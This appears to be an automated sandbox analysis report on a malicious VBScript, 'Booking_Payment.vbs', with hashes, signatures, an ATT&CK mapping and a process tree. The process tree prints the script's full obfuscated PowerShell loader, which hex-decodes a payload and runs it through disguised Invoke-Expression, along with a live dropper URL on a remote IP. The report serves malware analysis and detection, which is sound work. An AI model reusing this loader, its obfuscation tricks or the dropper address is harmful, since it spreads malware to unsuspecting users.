Analysis

  • max time kernel
    119s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    21-10-2021 18:20

General

  • Target

    Booking_Payment.vbs

  • Size

    4KB

  • MD5

    18ac5f0f564e29f3ab4f8a48fdea9ecc

  • SHA1

    47216392c30357a1de277c89703765ac8305f603

  • SHA256

    2853fdee44775a8aec2874b28c52d10537ce6f383ce53f3a610f45c9c82fa212

  • SHA512

    e5d71ba533a21554f142e471648e9032568872893275756684a9967b4bae4cd352ae70793b0358e1894808cf515a2f9b46431a05fbc4a50d88adaa3caab595a7

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://13.230.14.133/bypass.txt

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Booking_Payment.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H = 'http://13.230.14.133/bypass.txt';$eeeeeeeeeeeeee = '+`Close`8Close31Close+0Close3dClose+0Close+7Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close+7Close+cClose+7Close6eClose+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close+7Close+cClose+7Close`5Close+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close+7Close+cClose+7Close7`Close+7Close+9Close3bClose+`Close`8Close3+Close+0Close3dClose+0Close+7Close``Close``Close``Close``Close``Close``Close``Close``Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close``Close``Close``Close``Close``Close``Close``Close``Close+7Close+cClose+7Close+eClose+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close+7Close+cClose+7Close57Close+7Close+9Close3bClose+`Close`8Close3`Close+0Close3dClose+0Close+7Close`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close`eClose5`Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close+7Close+cClose+7Close`9Close`5Close+7Close+9Close3bClose+`Close`8Close33Close+0Close3dClose+0Close+7Close`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose+7Close+cClose+7Close6+Close`3Close+7Close+9Close3bClose+`Close`8Close`8Close+0Close3dClose+0Close+`Close`8Close31Close+bClose+`Close`8Close3+Close+bClose+`Close`8Close33Close+bClose+`Close`8Close3`Close3bClose+`Close`8Close`8Close`8Close+0Close3dClose+0Close+7Close``Close`fClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose6eClose`7Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+7Close+cClose+7Close57Close6eClose`cClose6fClose61Close``Close53Close5`Close7+Close`9Close+7Close+9Close3bClose+`Close`8Close`8Close`8Close`8Close+0Close3dClose+7Close`9Close60Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose`5Close63Close+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose`8Close+9Close+eClose+`Close`8Close`8Close`8Close+8Close+`Close`8Close+9Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close60Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+7Close+cClose+7Close`5Close58Close+8Close6eClose65Close60Close57Close60Close+dClose`fClose6+Close6aClose60Close+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+7Close+cClose+7Close60Close5`Close+0Close+`Close`8Close+7Close+9Close3bClose+6Close+8Close+7Close`9Close+7Close+bClose+7Close`5Close58Close+7Close+9Close+8Close+`Close`8Close`8Close`8Close`8Close+0Close+dClose`aClose6fClose69Close6eClose+0Close+7Close+7Close+9Close7cClose+6Close+8Close+7Close`9Close+7Close+bClose+7Close`5Close58Close+7Close+9Close'.Replace('`','4').Replace('+','2');$yyyyyyyyyyyyyyyyy = $eeeeeeeeeeeeee -split 'Close' |ForEach-Object {[char][convert]::ToUInt32($_,16) };$RDTFYGUIHJODRGFHTGYJH = $yyyyyyyyyyyyyyyyy -join '';$AA = 'In++++++++++++++ess'.Replace('++++++++++++++','voke-Expr') ; $BB= 'ion $R==================H'.Replace('==================','DTFYGUI');$CC='J-----------------JH'.Replace('-----------------','ODRGFHTGY');I`E`X ($AA , $BB , $CC -Join '')|I`E`X;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:472

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/472-55-0x0000000000000000-mapping.dmp
  • memory/472-59-0x0000000002614000-0x0000000002617000-memory.dmp
    Filesize

    12KB

  • memory/472-58-0x0000000002612000-0x0000000002614000-memory.dmp
    Filesize

    8KB

  • memory/472-57-0x0000000002610000-0x0000000002612000-memory.dmp
    Filesize

    8KB

  • memory/472-60-0x000007FEF2170000-0x000007FEF2CCD000-memory.dmp
    Filesize

    11.4MB

  • memory/472-61-0x000000000261B000-0x000000000263A000-memory.dmp
    Filesize

    124KB

  • memory/1884-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmp
    Filesize

    8KB